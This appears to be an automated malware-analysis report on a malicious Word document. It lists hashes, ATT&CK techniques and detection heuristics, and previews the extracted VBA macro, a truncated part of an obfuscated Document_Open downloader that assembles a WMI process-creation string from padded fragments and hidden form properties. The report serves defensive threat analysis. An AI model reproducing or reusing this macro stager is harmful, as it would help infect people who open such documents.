Office (OLE) malware analysis — malicious · b5ed9118513f3a79

MALICIOUS

Office (OLE)

197.1 KB Created: 2020-08-19 14:57:00 Authoring application: Microsoft Office Word First seen: 2020-08-25

MD5: 9a7ec5395cf577e1b6080d45671dc19c SHA-1: 1dbb41942a7bfcde8e2a1991b065f3e5f382345b SHA-256: b5ed9118513f3a797d4fd61c816c9eceaff2bdcae93827bc4024ce08055e29bd

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and 'CreateObject' calls, combined with a hidden UserForm property read, indicate a command stager designed to execute arbitrary code. This functionality is characteristic of a downloader, aiming to fetch and run a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Downloader.Generic-9398353-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-9398353-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15398 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15398 bytes
SHA-256: `8b1b76fe73774783e6e83a42ac3015866126d78967386c2115eb8ac27be1f045`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Nbcis07beg95" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Vc3y4gzy12f3sa3aq4.P2matgpfa4ym8 End Sub Attribute VB_Name = "Vc3y4gzy12f3sa3aq4" Attribute VB_Base = "0{14AE8CEF-1115-43A4-B5D2-43D694E795B1}{A6672EF9-6928-4BC9-BDDF-2F06880FEB7F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function P2matgpfa4ym8() Ne7pdtj8ddd3d8kobl = "405" If Len("A1do9xbqlbrv4Obfk7n5x09m") = Len("Vxuyp91p7jp203cc96") + 1 Then End If Len("Nk1t6edg0tn2fb_5Xxxt7oflxpmdl2Ck5ydezum337tsjz") < Len("Yyfkidx8vhi12cy4yx") Then MsgBox "Fm1kidl3etx4n1nfx" + "L7hh2t8q5v1dc67" MsgBox ("Myin9g9mto0o7a") MsgBox "Xahi2yavhn3k1c" + "L390iz9kyj0" End If If Len("Rmvtv5g4d6xe1qcaaXhkt0gr831_2") = Len("Z45njx5gruk9ve4") Then MsgBox "Ux8jsm2vfnoc" + "Br4mlyl8d4og0qxa" MsgBox ("Jbyy_cdrbxcii7j !!!") MsgBox "Mpdsvjrsmz5tdu8dv" + "Zmpbdoz6kajy78f" End If Ot90klgiwo5j = Vc3y4gzy12f3sa3aq4.HelpContextId + 50 + 50 Ba171kfd8xql = "568" If Len("Sp5qwfafd1stGhg0zx8fxbgymj2y") = Len("Cn693mq6ob_c0") + 1 Then End If Len("Fmba99004pbcnUk7ks2wfy2r61elwCz2_lkj41ofuq81_4c") < Len("Ezvhzbyltch") Then MsgBox "Qhs0oxyq_ws3nrvi6" + "W9chphsrc9y011tvs" MsgBox ("Y9mmewduh56ir") MsgBox "L3hk2q4kq8u24b" + "Ui30il8pt4qd6azx6r" End If If Len("N9tj5bvxrq4oCypvcjieunysln9k3") = Len("Sjvt0j_08yyp_") Then MsgBox "Kwahwevvid0v63sy" + "J1gdfjuzfvdnvreo" MsgBox ("Czn1zy1easuopiqial !!!") MsgBox "Vyjnqsqurixx6g8y" + "H9zcq0e2ak2mxevfp" End If B4qyklbf4wmqgb6 = ChrW(Ot90klgiwo5j + (15)) Fv11sas8p4mokv73g = "709" If Len("Jgzfyo2ferr59u0Kbd3710c4iosasn_") = Len("Pencc9m_n7apv73qw") + 1 Then End If Len("Vzozyixmp_ieDralpvwme34t59xhQbpltlp8qfq2t") < Len("Tii80vvn6_619") Then MsgBox "E6k_ecngzmvgvo0" + "Ewvpbkwazx3jhq" MsgBox ("Vo42w6rwr_uu7m") MsgBox "Agoo5iesv7iklskd_" + "W343xnwzaeqs2" End If If Len("R8wv74wiz7i6nvfeWvkav_ita4ei") = Len("Bdftvo7zhhx") Then MsgBox "B8u4_au89v8q1e8o" + "W_r_y5f16_2" MsgBox ("Mynxnscz2b3v !!!") MsgBox "Crgz4qsrxmhgy" + "Codeb4yq8u5nx5" End If Kx2bnl4tec_hl = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + B4qyklbf4wmqgb6 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Vc3y4gzy12f3sa3aq4.W5y86jyz3yvek5xv + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Q9rd_93new1w_t = "251" If Len("Eh1kk7v5jj3c_ju4lJzwtga70b0r499c4g") = Len("Yiutcdi6h74e") + 1 Then End If Len("Uo3x5hyazpm6wnqW_gco6ck5wskmZf8ozogkjwtej5iyr") < Len("Tsn7xcg9ms4hznz8") Then MsgBox "E9hzcgu2uukwjc" + "D3t5qes6i2cy" MsgBox ("B8fpnpb1jc1m4f") MsgBox "N7mcpxb967q" + "Rd09_sczyo7j6" End If If Len("L7z5ry_pmnoG6a0kt8dmxle161qpd") = Len("Cioigjap4lj") Then MsgBox "Puajizzemm2z4vve" + "Yt_inl26x51jee4" MsgBox ("Xzvzws22_z2 !!!") MsgBox "Sqvy8463jsjijow" + "Y6hi0w77_paq4jjyu" End If Owd57ijxes9oy0p = R7vtufy513ghb_4y(Kx2bnl4tec_hl) Fbzcxun7v7a = "811" If Len("E6yq_sk7yxvwjdjatVdufoxlg3ctwkd8blv") = Len("N5cwvpurc4u") + 1 Then End If Len("J ... (truncated)

SHA-256: 8b1b76fe73774783e6e83a42ac3015866126d78967386c2115eb8ac27be1f045

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Nbcis07beg95"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Vc3y4gzy12f3sa3aq4.P2matgpfa4ym8
End Sub


Attribute VB_Name = "Vc3y4gzy12f3sa3aq4"
Attribute VB_Base = "0{14AE8CEF-1115-43A4-B5D2-43D694E795B1}{A6672EF9-6928-4BC9-BDDF-2F06880FEB7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function P2matgpfa4ym8()
   Ne7pdtj8ddd3d8kobl = "405"
If Len("A1do9xbqlbrv4Obfk7n5x09m") = Len("Vxuyp91p7jp203cc96") + 1 Then End
If Len("Nk1t6edg0tn2fb_5Xxxt7oflxpmdl2Ck5ydezum337tsjz") < Len("Yyfkidx8vhi12cy4yx") Then
        MsgBox "Fm1kidl3etx4n1nfx" + "L7hh2t8q5v1dc67"
        MsgBox ("Myin9g9mto0o7a")
        MsgBox "Xahi2yavhn3k1c" + "L390iz9kyj0"
End If
If Len("Rmvtv5g4d6xe1qcaaXhkt0gr831_2") = Len("Z45njx5gruk9ve4") Then
       MsgBox "Ux8jsm2vfnoc" + "Br4mlyl8d4og0qxa"
       MsgBox ("Jbyy_cdrbxcii7j !!!")
       MsgBox "Mpdsvjrsmz5tdu8dv" + "Zmpbdoz6kajy78f"
End If

Ot90klgiwo5j = Vc3y4gzy12f3sa3aq4.HelpContextId + 50 + 50
   Ba171kfd8xql = "568"
If Len("Sp5qwfafd1stGhg0zx8fxbgymj2y") = Len("Cn693mq6ob_c0") + 1 Then End
If Len("Fmba99004pbcnUk7ks2wfy2r61elwCz2_lkj41ofuq81_4c") < Len("Ezvhzbyltch") Then
        MsgBox "Qhs0oxyq_ws3nrvi6" + "W9chphsrc9y011tvs"
        MsgBox ("Y9mmewduh56ir")
        MsgBox "L3hk2q4kq8u24b" + "Ui30il8pt4qd6azx6r"
End If
If Len("N9tj5bvxrq4oCypvcjieunysln9k3") = Len("Sjvt0j_08yyp_") Then
       MsgBox "Kwahwevvid0v63sy" + "J1gdfjuzfvdnvreo"
       MsgBox ("Czn1zy1easuopiqial !!!")
       MsgBox "Vyjnqsqurixx6g8y" + "H9zcq0e2ak2mxevfp"
End If

B4qyklbf4wmqgb6 = ChrW(Ot90klgiwo5j + (15))
   Fv11sas8p4mokv73g = "709"
If Len("Jgzfyo2ferr59u0Kbd3710c4iosasn_") = Len("Pencc9m_n7apv73qw") + 1 Then End
If Len("Vzozyixmp_ieDralpvwme34t59xhQbpltlp8qfq2t") < Len("Tii80vvn6_619") Then
        MsgBox "E6k_ecngzmvgvo0" + "Ewvpbkwazx3jhq"
        MsgBox ("Vo42w6rwr_uu7m")
        MsgBox "Agoo5iesv7iklskd_" + "W343xnwzaeqs2"
End If
If Len("R8wv74wiz7i6nvfeWvkav_ita4ei") = Len("Bdftvo7zhhx") Then
       MsgBox "B8u4_au89v8q1e8o" + "W_r_y5f16_2"
       MsgBox ("Mynxnscz2b3v !!!")
       MsgBox "Crgz4qsrxmhgy" + "Codeb4yq8u5nx5"
End If

Kx2bnl4tec_hl = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + B4qyklbf4wmqgb6 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Vc3y4gzy12f3sa3aq4.W5y86jyz3yvek5xv + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Q9rd_93new1w_t = "251"
If Len("Eh1kk7v5jj3c_ju4lJzwtga70b0r499c4g") = Len("Yiutcdi6h74e") + 1 Then End
If Len("Uo3x5hyazpm6wnqW_gco6ck5wskmZf8ozogkjwtej5iyr") < Len("Tsn7xcg9ms4hznz8") Then
        MsgBox "E9hzcgu2uukwjc" + "D3t5qes6i2cy"
        MsgBox ("B8fpnpb1jc1m4f")
        MsgBox "N7mcpxb967q" + "Rd09_sczyo7j6"
End If
If Len("L7z5ry_pmnoG6a0kt8dmxle161qpd") = Len("Cioigjap4lj") Then
       MsgBox "Puajizzemm2z4vve" + "Yt_inl26x51jee4"
       MsgBox ("Xzvzws22_z2 !!!")
       MsgBox "Sqvy8463jsjijow" + "Y6hi0w77_paq4jjyu"
End If

Owd57ijxes9oy0p = R7vtufy513ghb_4y(Kx2bnl4tec_hl)
   Fbzcxun7v7a = "811"
If Len("E6yq_sk7yxvwjdjatVdufoxlg3ctwkd8blv") = Len("N5cwvpurc4u") + 1 Then End
If Len("J
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.